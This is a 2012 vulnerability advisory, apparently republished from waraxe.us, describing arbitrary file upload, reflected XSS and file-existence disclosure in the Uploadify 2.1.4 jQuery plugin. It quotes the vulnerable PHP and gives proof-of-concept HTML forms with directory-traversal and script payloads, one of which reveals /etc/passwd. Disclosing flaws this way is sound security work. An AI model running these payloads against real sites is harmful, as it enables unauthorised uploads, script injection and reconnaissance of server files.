Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27887
HistoryApr 09, 2012 - 12:00 a.m.

[waraxe-2012-SA#083] - Multiple Vulnerabilities in Uploadify 2.1.4

2012-04-0900:00:00
vulners.com
52

[waraxe-2012-SA#083] - Multiple Vulnerabilities in Uploadify 2.1.4

Author: Janek Vind "waraxe"
Date: 05. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-83.html

Description of vulnerable software:


Uploadify is a jQuery plugin that integrates a fully-customizable multiple file
upload utility on your website. It uses a mixture of Javascript, ActionScript,
and any server-side language to dynamically create an instance over any DOM
element on a page.

http://www.uploadify.com/

Vulnerable versions

Affected is Uploadify version 2.1.4.

###############################################################################

  1. Arbitrary File Upload vulnerability in "uploadify.php"
    ###############################################################################

Reason: missing input data validation
Attack vector: user submitted GET or POST parameter 'folder'
Preconditions: none
Result: attacker can upload any files to remote system

Source code snippet from script "check.php":
-----------------[ source code start ]---------------------------------
if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
$targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];

    move_uploaded_file($tempFile,$targetFile);
    echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);

}
-----------------[ source code end ]-----------------------------------

We can see, that user submitted parameter 'folder' is used in argument
for php function "move_uploaded_file()". There is no input data validation,
therefore attacker can use directory traversal and upload files with any
extension to arbitrary directory on remote system.

Test:
-----------------[ PoC code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/uploadify-v2.1.4/uploadify.php&quot;
method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="/…/…/">
<input type="submit" value="Upload test">
</form>
</center></body></html>
-----------------[ PoC code end ]-----------------------------------

###############################################################################
2. Reflected XSS vulnerability in "uploadify.php"
###############################################################################

Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameter 'folder'
Preconditions: none

Test:
-----------------[ PoC code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/uploadify-v2.1.4/uploadify.php&quot;
method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="<script>alert(String.fromCharCode(88,83,83))</script>">
<input type="submit" value="Upload test">
</form>
</center></body></html>
-----------------[ PoC code end ]-----------------------------------

Result: XSS payload execution can be observed

###############################################################################
3. File Existence Disclosure vulnerability in "check.php"
###############################################################################

Reason: missing input data validation
Attack vector: user submitted POST parameters
Preconditions: none
Result: attacker can reveal existance of files and directories on remote system

Source code snippet from script "check.php":
-----------------[ source code start ]---------------------------------
$fileArray = array();
foreach ($_POST as $key => $value) {
if ($key != 'folder') {
if (file_exists($_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/' . $value)) {
$fileArray[$key] = $value;
}
}
}
echo json_encode($fileArray);
-----------------[ source code end ]-----------------------------------

We can see, that user submitted POST parameters are used in argument
for php function "file_exists()". There is no input data validation, therefore
attacker can use directory traversal and reveal existence of arbitrary files
and directories on affected system.

Test:
-----------------[ PoC code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/uploadify-v2.1.4/check.php&quot; method="post">
<input type="hidden" name="folder" value="/…/…/…/…/…/…/…/…/etc">
<input type="hidden" name="waraxe" value="passwd">
<input type="submit" value="Test">
</form>
</center></body></html>
-----------------[ PoC code end ]-----------------------------------

Result: {"waraxe":"passwd"}

Contact:


come2waraxe@yahoo.com
Janek Vind &quot;waraxe&quot;

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------